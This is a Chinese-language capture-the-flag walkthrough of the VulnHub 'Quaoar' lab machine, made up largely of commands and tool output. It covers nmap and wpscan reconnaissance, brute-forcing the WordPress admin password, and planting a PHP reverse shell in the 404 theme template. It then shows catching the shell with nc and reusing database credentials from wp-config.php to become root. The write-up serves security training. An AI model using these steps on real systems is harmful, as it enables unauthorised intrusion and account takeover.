Quaoar
靶机地址:http://www.vulnhub.com/entry/hackfest2016-quaoar,180/
识别目标主机IP地址
(kali㉿kali)-[~/Vulnhub/Quaoar]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.65.0/16 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.100 08:00:27:6b:e4:21 1 60 PCS Systemtechnik GmbH
192.168.56.138 08:00:27:2c:ce:d0 1 60 PCS Systemtechnik GmbH
利用Kali Linux自带的netdiscover工具识别目标主机的IP地址为192.168.56.138
NMAP 扫描
──(kali㉿kali)-[~/Vulnhub/Quaoar]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.138 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-28 09:08 EDT
Nmap scan report for bogon (192.168.56.138)
Host is up (0.00013s latency).
Not shown: 65526 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 d0:0a:61:d5:d0:3a:38:c2:67:c3:c3:42:8f:ae:ab:e5 (DSA)
| 2048 bc:e0:3b:ef:97:99:9a:8b:9e:96:cf:02:cd:f1:5e:dc (RSA)
|_ 256 8c:73:46:83:98:8f:0d:f7:f5:c8:e4:58:68:0f:80:75 (ECDSA)
53/tcp open domain ISC BIND 9.8.1-P1
| dns-nsid:
|_ bind.version: 9.8.1-P1
80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.2.22 (Ubuntu)
| http-robots.txt: 1 disallowed entry
|_Hackers
110/tcp open pop3 Dovecot pop3d
| ssl-cert: Subject: commonName=ubuntu/organizationName=Dovecot mail server
| Not valid before: 2016-10-07T04:32:43
|_Not valid after: 2026-10-07T04:32:43
|_ssl-date: 2022-10-28T21:08:34+00:00; +8h00m00s from scanner time.
|_pop3-capabilities: UIDL SASL TOP STLS RESP-CODES CAPA PIPELINING
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open imap Dovecot imapd
| ssl-cert: Subject: commonName=ubuntu/organizationName=Dovecot mail server
| Not valid before: 2016-10-07T04:32:43
|_Not valid after: 2026-10-07T04:32:43
|_ssl-date: 2022-10-28T21:08:33+00:00; +8h00m00s from scanner time.
|_imap-capabilities: ENABLE ID IMAP4rev1 listed capabilities have LITERAL+ post-login Pre-login STARTTLS LOGIN-REFERRALS IDLE LOGINDISABLEDA0001 OK SASL-IR more
445/tcp open netbios-ssn Samba smbd 3.6.3 (workgroup: WORKGROUP)
993/tcp open ssl/imap Dovecot imapd
|_ssl-date: 2022-10-28T21:08:33+00:00; +7h59m59s from scanner time.
| ssl-cert: Subject: commonName=ubuntu/organizationName=Dovecot mail server
| Not valid before: 2016-10-07T04:32:43
|_Not valid after: 2026-10-07T04:32:43
|_imap-capabilities: ENABLE IMAP4rev1 listed capabilities AUTH=PLAINA0001 LITERAL+ have post-login ID LOGIN-REFERRALS IDLE OK Pre-login SASL-IR more
995/tcp open ssl/pop3 Dovecot pop3d
| ssl-cert: Subject: commonName=ubuntu/organizationName=Dovecot mail server
| Not valid before: 2016-10-07T04:32:43
|_Not valid after: 2026-10-07T04:32:43
|_ssl-date: 2022-10-28T21:08:33+00:00; +7h59m59s from scanner time.
|_pop3-capabilities: UIDL SASL(PLAIN) TOP USER RESP-CODES CAPA PIPELINING
MAC Address: 08:00:27:2C:CE:D0 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 8h39m59s, deviation: 1h37m58s, median: 7h59m58s
|_smb2-time: Protocol negotiation failed (SMB2)
|_nbstat: NetBIOS name: QUAOAR, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb-os-discovery:
| OS: Unix (Samba 3.6.3)
| NetBIOS computer name:
| Workgroup: WORKGROUP\x00
|_ System time: 2022-10-28T17:08:24-04:00
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.09 seconds
目标主机开放的端口比较多,依次对开放的端口进行访问,以设法获取目标主机的shell,即Gain Access.
Gain Access
─$ searchsploit openssh 5.9
------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------- ---------------------------------
OpenSSH 2.3 < 7.7 - Username Enumeration | linux/remote/45233.py
OpenSSH 2.3 < 7.7 - Username Enumeration ( | linux/remote/45210.py
OpenSSH < 6.6 SFTP (x64) - Command Executi | linux_x86-64/remote/45000.c
OpenSSH < 6.6 SFTP - Command Execution | linux/remote/45001.py
OpenSSH < 7.4 - 'UsePrivilegeSeparation Di | linux/local/40962.txt
OpenSSH < 7.4 - agent Protocol Arbitrary L | linux/remote/40963.txt
OpenSSH < 7.7 - User Enumeration (2) | linux/remote/45939.py
------------------------------------------- ---------------------------------
Shellcodes: No Results
虽然openssh的版本貌似比较低,但是用searchspoit工具查询并没有可以利用的漏洞。
暂时跳过DNS服务。
利用浏览器访问目标主机,发现有个链接,链接到一张图片,将其下载到本地
─(kali㉿kali)-[~/Vulnhub/Quaoar]
└─$ steghide extract -sf Hack_The_Planet.jpg
Enter passphrase:
─(kali㉿kali)-[~/Vulnhub/Quaoar]
└─$ stegseek Hack_The_Planet.jpg /usr/share/wordlists/rockyou.txt
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek
[i] Progress: 99.28% (132.5 MB)
[!] error: Could not find a valid passphrase.
破解图片的密码失败,只能尝试其他的途径。
查看目标主机web站点是否有robots.txt文件,该文件直接告诉我们有目标有wordpress站点。
─(kali㉿kali)-[~/Vulnhub/Quaoar]
└─$ curl http://192.168.56.138/robots.txt
Disallow: Hackers
Allow: /wordpress/
发现了/wordpress目录
既然是wordpress站点,就肯定要用到wpscan工具,看是否可以扫描出用户名和有漏洞的插件。
─(kali㉿kali)-[~/Vulnhub/Quaoar]
└─$ wpscan --url http://192.168.56.138/wordpress/ -e u,ap
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.22
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[i] Updating the Database ...
[i] Update completed.
[+] URL: http://192.168.56.138/wordpress/ [192.168.56.138]
[+] Started: Fri Oct 28 23:11:57 2022
Interesting Finding(s):
[+] Headers
| Interesting Entries:
| - Server: Apache/2.2.22 (Ubuntu)
| - X-Powered-By: PHP/5.3.10-1ubuntu3
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://192.168.56.138/wordpress/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://192.168.56.138/wordpress/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://192.168.56.138/wordpress/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://192.168.56.138/wordpress/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 3.9.14 identified (Insecure, released on 2016-09-07).
| Found By: Rss Generator (Passive Detection)
| - http://192.168.56.138/wordpress/?feed=rss2, <generator>http://wordpress.org/?v=3.9.14</generator>
| - http://192.168.56.138/wordpress/?feed=comments-rss2, <generator>http://wordpress.org/?v=3.9.14</generator>
[+] WordPress theme in use: twentyfourteen
| Location: http://192.168.56.138/wordpress/wp-content/themes/twentyfourteen/
| Last Updated: 2022-05-24T00:00:00.000Z
| [!] The version is out of date, the latest version is 3.4
| Style URL: http://192.168.56.138/wordpress/wp-content/themes/twentyfourteen/style.css?ver=3.9.14
| Style Name: Twenty Fourteen
| Style URI: http://wordpress.org/themes/twentyfourteen
| Description: In 2014, our default theme lets you create a responsive magazine website with a sleek, modern design...
| Author: the WordPress team
| Author URI: http://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.1 (80% confidence)
| Found By: Style (Passive Detection)
| - http://192.168.56.138/wordpress/wp-content/themes/twentyfourteen/style.css?ver=3.9.14, Match: 'Version: 1.1'
[+] Enumerating All Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)
[i] Plugin(s) Identified:
[+] mail-masta
| Location: http://192.168.56.138/wordpress/wp-content/plugins/mail-masta/
| Latest Version: 1.0 (up to date)
| Last Updated: 2014-09-19T07:52:00.000Z
|
| Found By: Urls In Homepage (Passive Detection)
|
| Version: 1.0 (80% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://192.168.56.138/wordpress/wp-content/plugins/mail-masta/readme.txt
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <> (10 / 10) 100.00% Time: 00:00:00
[i] User(s) Identified:
[+] admin
| Found By: Author Posts - Display Name (Passive Detection)
| Confirmed By:
| Rss Generator (Passive Detection)
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[+] wpuser
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Fri Oct 28 23:12:01 2022
[+] Requests Done: 77
[+] Cached Requests: 6
[+] Data Sent: 19.364 KB
[+] Data Received: 19.369 MB
[+] Memory used: 235.52 MB
[+] Elapsed time: 00:00:04
陈宫发现了wordpress的用户名: admin 与wpuser,那看一下是否可以破解管理员admin的密码:
──(kali㉿kali)-[~/Vulnhub/Quaoar]
└─$ wpscan --url http://192.168.56.138/wordpress/ -U admin -P /usr/share/wordlists/rockyou.txt
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.22
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: http://192.168.56.138/wordpress/ [192.168.56.138]
[+] Started: Fri Oct 28 23:13:42 2022
Interesting Finding(s):
[+] Headers
| Interesting Entries:
| - Server: Apache/2.2.22 (Ubuntu)
| - X-Powered-By: PHP/5.3.10-1ubuntu3
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://192.168.56.138/wordpress/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://192.168.56.138/wordpress/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://192.168.56.138/wordpress/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://192.168.56.138/wordpress/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 3.9.14 identified (Insecure, released on 2016-09-07).
| Found By: Rss Generator (Passive Detection)
| - http://192.168.56.138/wordpress/?feed=rss2, <generator>http://wordpress.org/?v=3.9.14</generator>
| - http://192.168.56.138/wordpress/?feed=comments-rss2, <generator>http://wordpress.org/?v=3.9.14</generator>
[+] WordPress theme in use: twentyfourteen
| Location: http://192.168.56.138/wordpress/wp-content/themes/twentyfourteen/
| Last Updated: 2022-05-24T00:00:00.000Z
| [!] The version is out of date, the latest version is 3.4
| Style URL: http://192.168.56.138/wordpress/wp-content/themes/twentyfourteen/style.css?ver=3.9.14
| Style Name: Twenty Fourteen
| Style URI: http://wordpress.org/themes/twentyfourteen
| Description: In 2014, our default theme lets you create a responsive magazine website with a sleek, modern design...
| Author: the WordPress team
| Author URI: http://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.1 (80% confidence)
| Found By: Style (Passive Detection)
| - http://192.168.56.138/wordpress/wp-content/themes/twentyfourteen/style.css?ver=3.9.14, Match: 'Version: 1.1'
[+] Enumerating All Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)
[i] Plugin(s) Identified:
[+] mail-masta
| Location: http://192.168.56.138/wordpress/wp-content/plugins/mail-masta/
| Latest Version: 1.0 (up to date)
| Last Updated: 2014-09-19T07:52:00.000Z
|
| Found By: Urls In Homepage (Passive Detection)
|
| Version: 1.0 (80% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://192.168.56.138/wordpress/wp-content/plugins/mail-masta/readme.txt
[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:00 <> (105 / 137) 76.64% ETA: 00:00:0 Checking Config Backups - Time: 00:00:00 <> (120 / 137) 87.59% ETA: 00:00:0 Checking Config Backups - Time: 00:00:00 <> (136 / 137) 99.27% ETA: 00:00:0 Checking Config Backups - Time: 00:00:00 <> (137 / 137) 100.00% Time: 00:00:00
[i] No Config Backups Found.
[+] Performing password attack on Xmlrpc Multicall against 1 user/s
[SUCCESS] - admin / admin
All Found
Progress Time: 00:01:01 < > (40 / 28688) 0.13% ETA: ??:??:??
[!] Valid Combinations Found:
| Username: admin, Password: admin
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Fri Oct 28 23:14:48 2022
[+] Requests Done: 183
[+] Cached Requests: 41
[+] Data Sent: 52.911 KB
[+] Data Received: 4.132 MB
[+] Memory used: 317.59 MB
[+] Elapsed time: 00:01:06
成功破解了admin的密码: admin
用破解得到的用户名和密码登录wordpress管理后台,看是否可以上传php 反向shell文件(从网上下载php reverse shell脚本,并修改反弹的地址和端口):
─(kali㉿kali)-[~/Vulnhub/Quaoar]
└─$ cp ~/Tools/php_reverse_shell/php-reverse-shell-1.0/php-reverse-shell.php .
┌──(kali㉿kali)-[~/Vulnhub/Quaoar]
└─$ ls
Hack_The_Planet.jpg nmap_full_scan php-reverse-shell.php
┌──(kali㉿kali)-[~/Vulnhub/Quaoar]
└─$ mv php-reverse-shell.php shell.php
┌──(kali㉿kali)-[~/Vulnhub/Quaoar]
└─$ vim shell.php
首先尝试php shell文件上传点: media
提示上传失败,看来存在某种过滤,看一下其他的上传点:
尝试Appearance->Editor->Templates 修改404模板:
成功修改该页面,然后访问404页面(http://192.168.56.138/wordpress/wp-content/themes/twentyfourteen/404.php),成功拿到shell
──(kali㉿kali)-[~/Vulnhub/Quaoar]
└─$ sudo nc -nlvp 5555
[sudo] password for kali:
listening on [any] 5555 ...
connect to [192.168.56.137] from (UNKNOWN) [192.168.56.138] 34393
Linux Quaoar 3.2.0-23-generic-pae #36-Ubuntu SMP Tue Apr 10 22:19:09 UTC 2012 i686 i686 i386 GNU/Linux
07:46:18 up 1:13, 0 users, load average: 0.00, 0.01, 0.05
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ which python
/usr/bin/python
$ python -c 'import pty;pty.spawn("/bin/bash")
> '
www-data@Quaoar:/$
www-data@Quaoar:/$ cd /home/wpadmin
cd /home/wpadmin
www-data@Quaoar:/home/wpadmin$ ls -alh
ls -alh
total 12K
drwxr-xr-x 2 root root 4.0K Oct 22 2016 .
drwxr-xr-x 3 root root 4.0K Oct 24 2016 ..
-rw-r--r-- 1 wpadmin wpadmin 33 Oct 22 2016 flag.txt
www-data@Quaoar:/home/wpadmin$ cat flag.txt
cat flag.txt
2bafe61f03117ac66a73c3c514de796e
www-data@Quaoar:/home/wpadmin$
Root提权
在目标主机wordpress目录下有wp-config.php文件,其中包含了root用户名以及密码
/** MySQL database username */
define('DB_USER', 'root');
/** MySQL database password */
define('DB_PASSWORD', 'rootpassword!');
虽然是数据库的credentials,但是可以尝试一下是否是操作系统的用户名与密码
www-data@Quaoar:/var/www/wordpress$ su - root
su - root
Password: rootpassword!
root@Quaoar:~# id
id
uid=0(root) gid=0(root) groups=0(root)
root@Quaoar:~# ls -alh
ls -alh
total 48K
drwx------ 6 root root 4.0K Nov 30 2016 .
drwxr-xr-x 22 root root 4.0K Oct 7 2016 ..
drwx------ 2 root root 4.0K Oct 7 2016 .aptitude
-rw------- 1 root root 368 Jan 15 2017 .bash_history
-rw-r--r-- 1 root root 3.1K Apr 19 2012 .bashrc
drwx------ 2 root root 4.0K Oct 15 2016 .cache
---------- 1 root root 33 Oct 22 2016 flag.txt
-rw-r--r-- 1 root root 140 Apr 19 2012 .profile
drwx------ 2 root root 4.0K Oct 26 2016 .ssh
-rw------- 1 root root 4.7K Nov 30 2016 .viminfo
drwxr-xr-x 8 root root 4.0K Jan 29 2015 vmware-tools-distrib
root@Quaoar:~# cat flag.txt
cat flag.txt
8e3f9ec016e3598c5eec11fd3d73f6fb
成功拿到root
标签:00,http,192.168,wordpress,Vulnhub,靶机,root,Quaoar,56.138 From: https://www.cnblogs.com/jason-huawen/p/16838451.html